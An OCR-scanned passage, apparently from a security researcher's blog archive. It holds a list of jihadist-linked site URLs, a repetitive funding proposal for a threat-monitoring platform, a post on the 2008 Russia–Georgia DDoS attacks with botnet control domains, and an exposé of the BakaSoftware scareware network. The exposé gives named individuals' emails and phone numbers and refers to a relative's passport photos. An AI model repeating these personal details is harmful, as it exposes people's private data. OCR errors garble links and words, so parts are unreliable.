http://saraya.ps 
http://Sarayaalquds.org 
http://sarayaalquds.org 
http://Sarayasaad.com 
http://sarayasaad.com 
http://save-islam.com 
http://Sawtaljinad.org 
http://sawtaljihad.org 
http://sawtalummah.com 
http://se-te.com 
http://shabakataljahad.com 
http://shahamat-arabic.com 
http://shahamat-english.com 
http://shahamat-farsi.com 
http://shahamat-movie.com 
http://shahamat-urdu.com 
http://shamikh1.info 
http://shamilonline.org/rusnya/index _ru.htm 
http://sharia4indonesia.com 
http://Shiaweb.org 
http://shiaweb.org/hizbulla/index.html 
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¢ http://Shmo5allslam.net 
¢ http://shoutussalam.org 
¢ http://skaba.ps 

¢ http://Sobhank.com 

¢ http://sobhank.com/vb 

¢ http://somalimemo.net 

¢ http://somod.org 

¢ http://soutalhaq.net 

¢ http://Soutweb.100free.com 
¢ http://sqr-al3rb.com 

¢ http://suara-islam.com 

¢ http://sunnahcare.com 

¢ http://sunnahonline.com 
¢ http://suwaidan.com 

¢ http://swalif.net 

¢ http://syamina.com 

¢ http://syamorganizer.com 
¢ http://tahrir-syria.info 

¢ http://tajdeed.org.uk 

¢ http://takvahaber.net 

e http://tarani.info 

¢ http://Tawhed.ws 

¢ http://tevhiddergisi.com 
¢ http://tevhiddersleri.com 
¢ http://tevhididavet.com 
¢ http://tevhidigundem.net 
¢ http://theshamnews.com 
¢ http://thethirdjinad.com 
¢ http://thoriquna.com 

¢ http://thoriquwna.com 


¢ http://toorabora.org 
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http://turkhackteam.org 
http://twelvershia.net 
http://uicforce.co.vu 
http://ummah.com 
http://ummahislam.com 
http://ummetislam.info 
http://ummetislam.net 
http://vb999.maktoobblog.com 
http://vb.fpnp.net 
http://vb.roro44.com/index.php 
http://vd.ag 
http://vdagestan.com 
http://voa-islam.com 
http://W-N-N.net 
http://Wa3ad.org 
http://wa3iarabi.com 
http://wa7at.org/vb 
http://wap.kavkaz.tv 
http://worldakhbar.com 
http://worldnet.ws 
http://worldnet.ws/radio/index.html 
http://worldnet.ws/vb 
http://yenidenislam.com 
http://zad-muslim.com 
http://zaeer1.22web.net 
http://zaidhamid.pk 


http://zuheer17.maktoobblog.com 
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Detailed Project Funding Phase Information 


01. The initial stage of the project will consist of selective and timely purchase of all 
the necessary appliances including the timely localization and successful acquisition of fake 
Web sites honeypot solutions including the active acquisition of network assets for the purpose 
of successfully honeypot solution placement. 


¢ Associated deliverables will include access to proprietary technology the ability to asso- 
ciate long-term task including the ability to set the foundation for the Obmonix platform 
including eventual commercialization of the Obmonix platform further enhancing the op- 
erator’s ability to continue providing the Intelligence Community with the necessary data 
to proactively respond to a growing set of malicious nation-state and malicious actors type 
of cybercrime and cyber-jihad activity globally. 


02. The next stage will consist of active placement of the required equipment in a se- 
cure location including the placement of active secure measures in place to ensure that the 
Obmonix operator remains work in a secure location including premise. 


¢ Associated deliverables will include secure work place including the ability to empower 
the operator with the necessary data to perform various operator activity ensuring global 
presence for Intelligence Community members and the security industry 


03. The next stage will consist of active spam phishing and malware feed access pur- 
chase including successfully geolocated placement within specific regions of choice of interest 
inducing but not limited to Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina Faso, Chile, 
China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic People’s Republic of Korea, 
Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania, Sierra 
Leone, Sudan, Arab Republic Syrian, Togo, Uganda, Vanuatu, Yemen. 
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¢ Associated deliverables will include access to the world’s largest portfolio of threat intelli- 
gence data set including access to real-time data successfully empowering the operator 
with the necessary data to perform an operator activity. 


04. The next stage will include the active acquisition of service-based type of localiza- 
tion and acquisition solutions leading to a successful set of data to be processed and collected 
by the sensor. 


¢ Associated deliverables will include access to proprietary technology successfully empow- 
ering the operator with the necessary data to perform the operator activity including real- 
time monitoring of the world’s largest and most comprehensive sensor network based 
type of cybercrime and cyber-jihad sensor based type of platform. 


05. The next phase will include the active data acquisition from the Intelligence Community’s 
leading intelligence gathering platform in the form of active data placement including the 
establishment of an active threat intelligence-gathering portal based type of platform. 


¢ Associated deliverable will include the world’s largest data set of cybercrime and cyber 
jihad activity sensor type of platform eventually leading the Obmonix platform to reach a 
commercialization stage further enhancing the Intelligence Community’s and the security 
industry’s mission. 


Detailed Project Cost Proposal Information 


The initial stage of the project will consist of selective and timely purchase of all the 
necessary appliances including the timely localization and successful acquisition of fake Web 
sites honeypot solutions including the active acquisition of network assets for the purpose of 
successfully honeypot solution placement. 


¢ FortiMail 
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‘RATIMNET. 


Key points: 


The appliance is capable of processing millions of emails on a daily basis 


The appliance is capable of maintaining a list of thousands of fake emails allowing addi- 
tional attribution potentially expanding the capabilities of the appliance to include addi- 
tional custom made spam origin sources. 


¢ The appliance is capable of delivering actionable intelligence on millions of spam origin 
sources, for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily basis 


¢ The appliance is capable of delivering detailed information, leading, to the production of 
actionable intelligence, for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily basis. 


The FortiMail appliance would ensure the active acquisition of spam for the purpose of estab- 
lishing the foundations for a successful research and monitoring type of research and analysis 
type of system allowing the systematic real-time and automated acquisition of malicious 
software phishing and social engineering. 


¢ Blue Coat Malware Analysis 


Blue&%$Coat 
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Key points: 


¢ The appliance is capable of processing thousands of malware samples, on a daily basis 


¢ The appliance is capable of maintaining detailed information processed and delivered in 
an automated fashion for malicious sources originating in Iran, Pakistan, Saudi Arabia, 
Iraq and Syria 


¢ The appliance is capable of interacting with Web links found in malicious spam emails 
for the purpose of establishing the foundations, for successful monitoring of malicious 
software phishing and social engineering originating for Iran, Pakistan, Saudi Arabia, Iraq, 
and Syria including the automated processing and interaction with mobile malware 


¢ The appliance is capable of maintaining detailed information leading to the production of 
quality real-time, actionable intelligence type of reports for malicious software phishing 
and social engineering data type of origin sources for Iran, Pakistan, Saudi Arabia, Iraq 
and Syria 


The Blue Coat Malware Analysis would ensure the automated and real-time acquisition of 
malicious software phishing and social engineering type of research and analysis type of 
research for the purpose of ensuring the active and real-time acquisition of malicious software 
phishing and social engineering research type of activity originating in these sources. 


* Vormetric encryption appliance 


/ormetric 


Data Security” 
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Key points: 


¢ The encryption appliance would ensure the real-time data storage of the research and 
analysis type of research and analysis type of data to ensure the availability confidentiality 
and integrity of the data for the purpose of producing actionable real-time intelligence 
based type of research and analysis reports type of research and analysis data. 


¢ The encryption appliance would ensure the active real-time storage of the actionable and 
real-time delivered type of research and analysis type of data allowing the efficient and 
systematic and automated research and analysis type of research report data to be pro- 
cessed and analyzed. 


The encryption appliance would ensure that the platform operator is properly empowered with 
the necessary data techniques and technologies to properly act upon analyze and respond to 
cybercrime and cyber jihad events globally. 


¢ Barracuda Web Application appliance 


v Barracuda 


Key points: 
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¢ The Web application appliance would allow the automated secure use of the robot system 
allowing the systematic real-time data acquisition on various jihadst sources 


¢ The Web application appliance would ensure the automated and efficient use of the robot 
in a secure fashion allowing the production of real-time actionable intelligence allowing 
the production of research and analysis based type of research and analysis type of, data. 


The Web application appliance would ensure that the operator is properly empowered with 
the necessary data techniques and technologies to properly act upon analyze and respond to 
cybercrime and cyber jihad events globally. 


¢ Checkpoint DDoS Protector 


Check Point 


\ 
@u 
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= SOFTWARE TECHNOLOGIES LTD. 


Key points: 


* The appliance is capable of preventing exposure of the network assets utilized by the 
network resulting potentially resulting in the exposure of the availability confidentiality 
and integrity of the information 


¢ The appliance is capable of ensuring the real-time automated and persistent availability 
and integrity and confidentiality of the information 


The Checkpoint DDoS Protector would ensure the constant availability of the network in- 
frastructure utilized in this project potentially preventing compromise of the network assets 
resulting in improved productivity and realization of various project objectives. 
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¢ Encryption appliance 


Ultra Electronics 3eT| 


Key points: 


¢ The encryption appliance is capable of ensuring the confidentiality integrity and availabil- 
ity of the information 


¢ The encryption appliance is capable of distinguishing between multiple networks further 
ensuring a closed network type of network access 


The encryption appliance would ensure that the maximum possible secure measures are 
currently in place further ensuring that access to the closed restricted network remains as 
private as possible ensuring the confidentiality integrity and availability of the information to 
further ensure the active real-time intelligence based real-time type of research and analysis 
type of research and analysis type of data. 


¢ Cisco Catalyst 
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Ae 
CISCO. 


Key points: 


¢ The appliance is capable of ensuring the real-time and automated use of the network 
equipment necessary to maintain the active infrastructure to ensure that it’s operating in 
an automated and efficient fashion 


Cisco Catalyst is a network equipment allowing the efficient productivity type of interconnec- 
tion between all the platforms and network equipment used in this project. 


* Kapow appliance 
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kapOw 


Key points: 


¢ The appliance is capable of processing hundreds of thousands of Web sites on a daily 
basis ensuring the automated processing and analysis of jihadist communities allowing 
the automation of the monitoring process to further enhance the produced actionable 
intelligence leading to a research and analysis produced type of research and analysis 
type of data. 


¢ The appliance is capable of monitoring and establishing the foundations for real-time mon- 
itoring and analysis of jihadist communities for the purpose of producing actionable real- 
time intelligence research and analysis type of research and analysis data. 


¢ The appliance is capable of processing multiple jihadist forum communities for the pur- 
pose of establishing the foundations for successful real-time actionable intelligence pro- 
ducing research and analysis type of research and analysis data. 


The analysis appliance would ensure timely and real-time access to current and historical 
intelligence data in regard to jihadist activities online,through the systematic automated and 
real-time data acquisition from a variety of public and closed sources for the purpose of setting 
up the foundations for a successful data source leading to a successful analysis and research 
type of analysis activities. 


¢ Appliance router 
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Infoblox 


CONTROL YOUR NETWORK 
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Key points: 


¢ The appliance router would ensure the constant and real-time availability of the network 
assets for the purpose of active and timely acquisition of actionable real-time research 


and analysis type of research and analysis report type of research and analysis network 
assets availability. 


The purpose of the appliance router would be to ensure real-time connectivity with a variety 
of platforms to ensure that the operator is properly empowered with the necessary data 
techniques and technologies to properly act upon analyze and respond to cybercrime and 
cyber jihad events globally. 


¢ Analytics appliance 


O Palantir 
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Key points: 


¢ the analytics appliance would be capable of performing real-time assessment of cyber- 
crime and cyber jihad events globally and will ultimately empower the Obmonix platform 
operator with the necessary data information and knowledge to act upon prevent and 
respond to cybercrime and cyber jihad events globally 


The purpose of the appliance would be to empower the operator with the necessary data 


information and knowledge to act upon react to and respond to various cybercrime and cyber 
jihad events globally. 


¢ Rosette appliance 


BASIS 


TECHNOLOGY 


Key points: 
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¢ The localization appliance will ultimately empower the Obmonix platform operator with 
the necessary data information and knowledge to act upon respond to and prevent 
widespread damage while analyzing cybercrime and cyber jihad events globally. 


The purpose of the localization appliance would be to empower the Obmonix platform opera- 
tor with the necessary data information and knowledge to act upon respond to and prevent 
widespread damage provoked by cybercrime and cyber jihad events globally. 


¢ Systran appliance 


<5 SYSTRAN 


Language Translation Technologies 


Key points: 


¢ The Systran appliance will ultimately empower the operator with the necessary data in- 
formation and knowledge to act upon respond to and prevent widespread damage while 
analyzing cybercrime and cyber jihad events globally. 


The purpose of the Systran appliance would be to empower the Obmonix platform operator 
with the necessary data information and knowledge to act upon respond to and prevent 
widespread damage provoked by cybercrime and cyber jihad events globally. 
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Funding Phase 


The initial funding phrase will consist of active acquisition of assets for the purpose of 
obtaining access to industry leading and proprietary selected providers of threat intelligence 
for the purpose of establishing the foundations for an active sensors network type of cy- 
bercrime/cyber jihad monitor sensor network type of data. The initial stage will consist of 
obtaining assets for the purpose of obtaining access to industry leading and proprietary 
selected equipment for the purpose of setting the foundations for a successful sensor network 
based type of data. 


The initial phase will consist of active purchase of the following equipment: FortiSandbox, 
Blue Coat Malware Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, Vormetric 
encryption appliance, including the following subscription-based type of threat intelligence 
gathering data - Team Cumry, threat, data, feed, Kaspersky, threat, data, feed, Abusix, threat, 
data, feed, MalwarePatrol, threat, data, feed, Sophos, threat, data, feed, OPSWAT, Abusix, 
Threat, Feed, Threat, Feed, ProjectHoneypot, threat, data, feed. 


- Kaspersky Data Feed 

- Sophos Data Feed 

- Team Cumry Data Feed 
- MalwarePatrol Data Feed 
- Abusix Data Feed 

- LookingGlass Data Feed 


- Cyren Data Feed 
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- Symantec Data Feed 


- VirusTotal Data Feed 


- ProjectHoneypot Data Feed 


The second funding phase will consist of active acquisition of honeypot appliance including 
active netblock purchase within a dedicated set of countries for the purpose of establishing the 
foundations of an active sensor network type of data-acquisition activities. The second funding 
phase will consist of active acquisition of the following proprietary appliances: Honeybox 
Enterprise, honeybox SCADA, including netblocks within the following countries, 


The third funding phase will consist of active purchase of service and solution-based ap- 
pliance, including data-processing appliance, including localization appliance, for the purpose 
of setting up the foundations for the Obmonix platform successfully empowering its operator 
with the necessary data and expertise for the purpose of actively responding to global 
cybercrime and jihad events. 


The third funding phase will consist of active purchase of the following appliances: Kapow 
Software, Rosette appliance, Systran appliance, Sentinel appliance, Palantir appliance. 


The fourth funding phase will consist of active purchase of the World’s most popular solution- 
oriented portal for Information Security - Expedited Entry Into the Cyber Warfare Realm - 
a Pro-U.S Based Offensive and Asymmetric Cyber Warfare Practical Trends Application Big 
Data and Research-Centered R &D Platform - further ensuring successfully and ongoing 
commercilization including the active acquisition of client-base, including the establishing of 
the World’s largest endpoint based sensor network for tracking and responding to cybercrime 
and jihad events globally. 


Dancho Danchev will build a pro-U.S offensive and asymmetric cyber warfare program 
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that will inevitably dive deep into the Cyber Warfare realm and will produce what can be best 
described as the U.S primary source for offensive and asymmetric cyber warfare information 
repository and data-information on current and future trends and provide the foundations for 
a successful R &D cyber warfare partnership with millions of loyal Pro-Western cyber warriors 
and researchers globally positioning the platform as the leading think-tank for practical 
and relevant cyber warfare power including the World’s leading Pro-Western Cyber Warfare 
Research and Development research program center. 


With the U.S attempting to tackle the country’s perceived and outdated Mis-understanding 
of Cyber Warfare in Today’s Modern Russia China and Iran dominated Cyber Warfare Realm 
including the ongoing shortage of recruitment and relatively outdated and not necessary dy- 
namic HR-management pool of hundreds of thousands of Pro-U.S Cyber Warriors the platform 
ultimately empower the re-position the U.S as the dominant Cyber Warfare power by providing 
actionable think-tank type of proactive and actionable Cyber Warfare insight including the 
active and permanent recruitment of millions of Pro-U.S Cyber Warriors further supporting the 
U.S’s mission on its way to dominate and launch offensive and defensive cyber missions and 
related research attacks. 


The project will conduct what can be best described as the most comprehensive study 
and analysis to the United States out-dated understanding of the Cyber Warfare realm and 
provide actionable and practical insight including a production-ready HR-management and 
Big Data driven Cyber Warfare platform successfully disrupting international cybercrime 
networks conducting economic terrorism infiltrating the vibrant cyber-crime and cyber jihad 
international community and successfully recruiting millions of Pro-U.S Cyber Warriors. The 
First Stage of the project would ensure that the foundations for a successful invite-only Pro-U.S 
Cyber Warfare community have already been established through the direct launching and 
operation of the World’s Largest and Proprietary Invite-Only Pro-U.S Cyber Warfare Forum 
Community. 


Associated deliverables will include: the World’s largest search engine for security infor- 
mation, the World’s most vibrant community for security job search, the World’s most vibrant 
proprietary community for sharing disseminating communicating and enriching security data, 


5892 


the World’s most comprehensive sensor network for observing disseminating and responding 
to global cybercrime-events, the release of community-enriched security router, the successful 
release of community-enriched privacy router, the development and release of community- 
enriched public threat feed, the release of community-enriched private threat feed, including, 
proprietary threat feed, targeted threat intelligence on demand type of research and analysis 
producing solution, proprietary bug bounty solution, hacking and security-oriented online 
radio, hacking and security-oriented E-zine, hacking and security-oriented videocast, on- 
demand penetration testing and offensive team consulting, on-demand Web site monitoring 
for security events, OEM partnership capabilities, custom-build anti-virus scanner capabilities. 


Community Industry Reference 


The contractor Dancho Danchev is an internationally recognized cybercrime researcher 
security blogger and threat intelligence analyst in the field of cybercrime research having 
successfully contributed to the overall demise of cybercrime internationally throughout the 
past decade having successfully pioneered a variety of threat intelligence gathering method- 
ologies leading him to a successful, pursued of high profile nation-state actors and malicious 
actors across the globe leading him to a successful pursued of high-profile nation-state 
actors and malicious adversaries across the globe the researcher successfully launched a 
newly launched startup named Disruptive Individuals aiming to disrupt the undermine the 
international cybercrime and cyber-jihad ecosystem globally. 


Statement of Work (SOW) 


01. Vendor contact - the initial stage of the project will consist of direct contact between 
industry leading commercial security appliance providers further requesting pricing and 
shipping details including a “point-of-contact”. 


¢ Possible deliverables consisting of the initial stage include industry-leading security appli- 
ance - FortiMail, Blue Coat Malware Analysis. FortiSandbox, Vormetric encryption appli- 
ance, Barracuda Web Application appliance, Checkpoint DDoS Protector, Ethernet encryp- 
tor, Cisco Catalyst, Kapow appliance, Palantir appliance, Cisco firewall appliance, Rosette 
appliance, Systran appliance, NAS appliance, pfSense appliance, Honeybox appliance, 
Honeybox SCADA appliance. 
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02. Vendor netblock contact - The initial stage of the project will consist of direct contact 
between industry leading providers of netblock requesting pricing information for specific 
pre-defined geolocated regions of interest. 


¢ Possible deliverables including netblock in Algeria, Argentina, Bahrain, Bolivia, Brazil, 
Burkina faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic 
People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, 
Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, Van- 
uatu, Yemen. 


03. Vendor threat data contact - the initial stage of the project will consist of direct contact 
between industry-leading including a selected set of threat data providers requesting pricing 
information including possible partnership opportunity. 


¢ Possible deliverables including Team Cumry threat data feed Kaspersky threat data feed, 
Abusix threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, 
Abusix Threat Feed, ProjectHoneypot threat data feed. 


04. Secure location foundation - the initial stage of the project will consist of direct evaluation 
of the infrastructure required for the secure location including direct contact between security 
vendors to ensure a secure location. 


¢ Possible, deliverables, include, military-grade, fence, surveillance, security, guard. 


05. Vendor connection contact - the initial stage of the project will consist of direct contact 
between vendor to ensure that the infrastructure is properly secured ensuring a timely and 
secure infrastructure. 


¢ Possible deliverables include direct connection. 


06. Secure work environment - the initial stage of the project will consist of direct evaluation 
including a direct purchase of a work terminal to ensure a smooth and secure work environ- 
ment 


¢ Possible deliverables including RF shielding, SEL SP-157, FSPK-10, SEL SP-113 "Blockade". 
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07. Secure work environment - the initial stage of the project will consist of direct evaluation 
including a direct purchase of equipment related to secure work environment to ensure a 
smooth and secure work environment. 


¢ Possible deliverables including Cisco Firepower ASA, CheckPoint Threat appliance, Nova 
network appliance, Fortinet security appliance, Dell Soho network, security appliance. 


The contractor Dancho, Danchev is one of the world’s leading experts in the field of cybercrime 
research and threat intelligence gathering having successfully tracked monitored and profiled 
high-profile nation-state and malicious actors type of fraudulent activity over the past decade 
having successfully pioneered and established a direct connection with some of the world’s 
leading providers of threat intelligence gathering. 


The contractor’s initial goal for the purpose of the Obmonix platform would be to achieve the 
world’s largest and most comprehensive sensor type of network for monitoring profiling and 
keeping track of nation-state malicious-actors type of fraudulent and malicious activity. 


The project main base would be located in a discreet location in Sofia Bulgaria. The 
contractor would eventually ensure that active RF shielding including basic physical security 
measures are taken in place including active surveillance military-grade fence and an asso- 
ciated security guard are in place for the purpose of establishing the foundation of a secure 
work environment. 


The Obmonix platform aims to build the World’s most versatile and comprehensive sen- 
sor network for intercepting monitoring and responding to cybercrime and cyber jihad events 
successfully deploying a variety of proprietary sensor network based of honeypot appliances 
industry-wide partnership including the utilization of proprietary cybercrime and cyber jihad 
forum and community monitoring and infiltration campaigns successfully positioning the 
platform as the leading indicator for cybercrime and cyber jihad activity globally. 
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Cost Proposal - Detailed Project Information 


01. Equipment cost - The Obmonix platform will ultimately rely on the following equipment 
cost for the purpose of establishing the foundations for the Obmonix platform. 


FortiMail 


FortiSandbox 


Blue Coat Malware Analysis 
¢ Vormetric encryption appliance 
¢ Checkpoint DDoS Protector 


¢ Encryption appliance 


Cisco Catalyst 


Kapow appliance 


¢ Appliance router 


Analytics appliance 


Infoblox Trinzic 1420 
¢ Nova network security 


* Cisco firewall appliance 


IlusionBlack Framework 


Rosette appliance 


Systran appliance 

¢ NAS appliance 

¢ pfSense 

* Honeybox appliance 

* Honeybox SCADA appliance 


¢ Network equipment 


Detailed Project Funding Phase Information 
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cybercrime/cyber jihad monitor sensor network type of data. 


The initial funding phrase will consist of active acquisition of assets for the purpose 
of obtaining access to industry leading and proprietary selected providers of threat intelli- 
gence for the purpose of establishing the foundations for an active sensors network type of 


The initial stage will consist 


of obtaining assets for the purpose of obtaining access to industry leading and proprietary 
selected equipment for the purpose of setting the foundations for a successful sensor network 
based type of data. 


¢ The initial phase will consist of active purchase of the following equiptment: FortiSand- 
box, Blue Coat Malware Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco Catalyst, 
Vormetric encryption appliance, including the following subscription-based type of threat 
intelligence gathering data - Team Cumry threat data feed, Kaspersky threat data feed, 
Abusix,threat data feed, MalwarePatrol threat data feed, Sophos threat data feed, OPSWAT, 


Including the following Threats Feeds: 


Abusix Threat Feed, ProjectHoneypot threat data feed. 


Kaspersky Data Feed 
Sophos Data Feed 
Jigsaw Threat Data Feed 
IBM X-Force Exchange 
Team Cumry Data Feed 
Proofpoint Threat Feed 
NetSTAR Data Feed 
RiskIQ Data Feed 

ESET Data Feed 
Pixalate Data Feed 
MalwarePatrol Data Feed 
Abusix Data Feed 
Massive Data Feed 
PhishLabs Data Feed 
LookingGlass Data Feed 


Blueliv Data Feed 
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¢ Mnemonic Data Feed 

¢ Cyren Data Feed 

¢ ADMINUSLabs Data Feed 
¢ NSFOCUS Data Feed 

¢ Webroot Data Feed 


« Symantec Data Feed 


VirusTotal Data Feed 


¢ ProjectHoneypot Data Feed 


02. The second funding phase will consist of active acquisition of honeypot appliance including 
active netblock purchase within a dedicated set of countries for the purpose of establishing 
the foundations of an active sensor network type of data-acquisition activities. 


* The second funding phase will consist of active acquisition of the following proprietary 
appliances: Honeybox Enterprise, Infoblox Trinzic 1420, honeybox SCADA, including net- 
blocks within a dedicated set of countries - Algeria, Argentina, Bahrain, Bolivia, Brazil, 
Burkina faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic 
People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, 
Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, Van- 
uatu, Yemen. 


03. The third funding phase will consist of active purchase of service and solution-based 
appliance, including data-processing appliance, including localization appliance, for the 
purpose of setting up the foundations for the Obmonix platform successfully empowering 
its operator with the necessary data and expertise for the purpose of actively responding to 
global cybercrime and jihad events. 


¢ The third funding phase will consist of active purchase of the following appliances: Kapow 
Software, Rosette appliance, Systran appliance, Sentinel appliance, Palantir appliance. 


In case you’re interested in working with me for the purpose of implementing this project in- 
cluding possible investor introduction - | can be reached at dancho.danchev@hush.com 


1. http: //www.dia.mil/Business/Needipedia/ 
2. https://www.srf.org/ 


5898 


14.8.2 The Russia vs Georgia Cyber Attack (2018-12-17 20:08) 


Florida, U.S.A. Okay 59.4 59.9 60.5 
Amsterdam, Netherlands Okay 149.3 164.6 275.4 
Melbourne, Australia Okay 173.8 174.5 175.0 
Singapore, Singapore Okay 208.5 214.0 238.6 
New York, U.S.A. Packets lost {100%) 
AmsterdamZ, Netherlands Packets lost (100%) 
Austinl, U.S.A. Packets lost (100%) 
London, United Kingdon Packets lost (100%) 
Stockholm, Sweden Packets lost {100%) 
Cologne, Germany Packets lost (100%) 
Chicago, U.S.A. Packets lost (100%) 
Austin, U.S.A. Packets lost (100%) 
4Amsterdam3, Netherlands Packets lost (100%) 
Krakow, Poland Packets lost (100%) 
Paris, France Packets lost (100%) 
Copenhagen, Denmark Packets lost (100%) 
San Francisco, U.S.A. Packets lost (100%) 
Vancouver, Canada Packets lost (100%) 
Madrid, Spain Packets lost (100%) 
Shanghai, China Packets lost (100%) 
Lille, France Packets lost (100%) 
Zurich, Switzerland Packets lost (100%) 
Munchen, Germany Packets lost (100%) 
Cagliari, Italy Packets lost (100%) 
Hong Kong, China Packets lost (100%) 
Johannesburg, South AfricaPackets lost (100%) 
Porto Alegre, Brazil Packets lost (100%) 
Sydney, Australia Packets lost (100%) 
Mumbai, India Packets lost (100%) 
Santa Clara, U.S.A. Packets lost (100%) 


Last month’s lone gunman [1]DDoS attack against Georgia President’s web site seemed like 
a signal shot for the cyber siege to come a week later. Here’s the complete coverage of 
the coordination phrase, the execution and the actual impact of the cyber attack so far - 
"[2]Coordinated Russia vs Georgia cyber attack in progress" : 


"Who's behind it? The infamous Russian Business Network, or literally every Russian 
supporting Russia’s actions? How coordinated and planned the cyber attack is, and do we 
actually have a relatively decent example of cyber warfare combining PSYOPs (psychological 
operations), and self-mobilization of the local Internet users by spreading “For our motherland, 
brothers!” or “Your country is calling you!” hacktivist messages across web forums. Let’s find 
out, in-depth. With the attacks originally starting to take place several weeks before the actual 
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“intervention” with [3]Georgia President’s web site coming under DDoS attack from Russian 
hackers in July, followed by active discussions across the Russian web on whether or not DDoS 
attacks and web site defacements should in fact be taking place, which would inevitably come 
as a handy tool to be used against Russian from Western or Pro-Western journalists, the peak 
of [4]DDoS attack and the actual defacements started taking place as of Friday." 


Some of the tactics used : 


distributing a static list of targets, eliminate centralized coordination of the attack, en- 
gaging the average internet users, empower them with DoS tools; distributing lists of remotely 
SQL injectable Georgian sites; abusing public lists of email addresses of Georgian politicians 
for spamming and targeted attacks; destroy the adversary’s ability to communicate using the 
usual channels - Georgia’s most popular hacking portal is under DDoS attack from Russian 
hackers. 


Some of the parked domains acting as command and control servers for one of the bot- 
nets at 79.135.167.22 : 


79.135.167.22 
Overall Reputation: tennensones atl Delisting: How do | clear my history? 
Good Neutral Bad 


ISP Location 


See 


(CrmBeH) 
2 


Burgas 


Bunrapusa ieppras) 


AY] dzhik Plovdiv 


“Gp (Flneagna) 


suas 36 
j 7 Bandifira*e “7 - *¢ 
i nega Eskis cone 


y ~Balikesir~ MA 


os 


Deed Soma) S 


@A08 pase a hal Hee akeaey 1 Tele. sete he raat i ise) 


emultrix .org 
yandexshit .com 


ad.yandexshit .com 
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a-nahui-vse-zaebalo-v-pizdu .com 
killgay .com 

nsl.guagaga .net 

ns2.guagaga .net 

ohueli .net 

pizdos .net 


googlecomaolcomyahoocomaboutcom.net 


Actual command and control locations : 
a-nahui-vse-zaebalo-v-pizdu .com/a/nahui/vse/zaebalo/v/pizdu/ 


prosto.pizdos .net/ _lol/ 


[5]Consider going through the complete coverage of what’s been happening during the 
weeked. Considering the combination of tactics used, unless the conflict gets solved, more 
attacks will definitely take place during the week. 


1. ftp: /Pologs. zdnet con /security/?pe1638 
2, http: /elogs.zanet .con/security/?p-1679 
3. hetp: //ologs.zdnet .con/security/2p=1539 
4. 
5. 


ttp://www.telegraph.co.uk/news/worldnews/europe/georgia/2539157/Georgia-Russia-conducting-cyber-war .htm 


ttp://blogs .zdnet .com/security/?p=1670 


14.8.3 Historical OSINT - Massive Black Hat SEO Campaign Syndicating Google 
Trends, Spotted, in, the Wild, Serves, Scareware (2018-12-18 10:05) 
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2019 


15.1 January 


15.1.1 Who’s Behind BakaSoftware? - OSINT Analysis (2019-01-15 18:32) 


Remember [1]BakaSoftware? The ubiquitous scareware-serving and distributing money 
laundering scareware affiliate-based network circa 2008? It appears that the time has come 
to expose the actual individuals behind the campaign and the actual network. 


In this analysis I’ll discuss in depth the BakaSoftware franchise circa 2008 including in- 
depth and personally identifiable information on the cybercriminals behind it with the idea to 
empower law enforcement and the security industry with the necessary data and information 
that would eventually lead to the prosecution and tracking down of the cybercriminals behind 
BakaSoftware. 


| can be reached at dancho.danchev@hush.com 


Personal Photo of Gavril Danilkin - Founder and CEO of BakaSoftware: 
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Second Personal Photo of Gavril Danilkin - Founder and CEO of BakaSoftware: 
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Personally Identifiable Information regarding BakaSoftware’s Founder and CEO - Gavril 
Danilkin: 


Name: Gavril Danilkin 


Email: gavril@penza.net; fido@penza.net; doncapone@mail.ru; gav ril@sura.com.ru; 


Mobile Phone: 8412631806; 89023537746; 841251-06-02; 841256-49-45; 841276-06-93 
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Skype: BakaDialer 


Web Site: http://penza-stroika.narod.ru 


BakaSoftware Social Network Visualization Graph courtesy of Maltego: 
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Personal Passport Photo of Gavril Danilkin’s father Danilkin Vasily Vasilyevich: 
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— Lied IRE CHC i3t «ix: 
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Second Personal Passport Photo of Gavril Danilkin’s father Danilkin Vasily Vasilyevich: 
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Malicious and Fraudulent Infrastructure reconnaissance: 


hxxp://bakasoftware.com - 216.240.138.200 - Email: gavril@penza.net 


hxxp://ns1.bakasoftware.com - 216.255.189.139 Email: support@tobesoftware.com 
5909 


hxxp://tst.bakasoftware.com - 216.255.189.155 - Email: support@tobesoftware.com 


hxxp://bakasoftware.net - 208.88.227.36; 208.88.227.36 - Email: krab@thekrab.com 


hxxp://bakadialer.com 


Personally Identifiable Information regarding BakaSoftware - TheKrab: 


Name: TheKrab 


Email: marck@gmail.com 


Phone: +7 012-225-5252 


Web site: http://smmprofi.ru/marck 
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Personal Photo of a known BakaSoftware Gang Member known as - TheKrab: 
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Related Personal Photo of a known BakaSoftware Gang Member known as - TheKrab: 
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It gets even more interesting to find out that BakaSoftware’s Gavril Danilkin is currently running 
a rogue and potentially malicious rogueware and adware distributing affiliate-company known 
as Zaxar Limited. Let’s take the time and effort and provide actionable intelligence on the 
infrastructure behind the campaign. 


Related Zaxar Ltd Information: 


Zaxar Limited 
5935 


P.O. Box 54922, 


Zip 3729, 


Limassol, Cyprus 


e-mail: secretary@zaxar.net 


Related malicious URLs known to have participated in the campaign: 


hxxp://zxrmedia.com/client/current _version6/cef _extensions.pak 


hxxp://zxrmedia.com/client/current _version6/gameslist.dat 


hxxp://zxrmedia.com/client/current _version6/calling.wav 


hxxp://zxrmedia.com/client/current version6/cef 100 _percent.pak 
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hxxp://zxrmedia.com/client/current _version6/devtools _resources.pak 


hxxp://zxrmedia.com/client/current _version6/cef.pak.info 


Fraudulent and malicious rogue network infrastructure reconnaissance: 


hxxp://zaxargames.com - 185.82.210.27; 185.82.210.24; 185.82.210.30 


hxxp://zxrmedia.com - 185.82.210.5; 185.82.210.26; 188.42.129.36; 185.82.210.29 


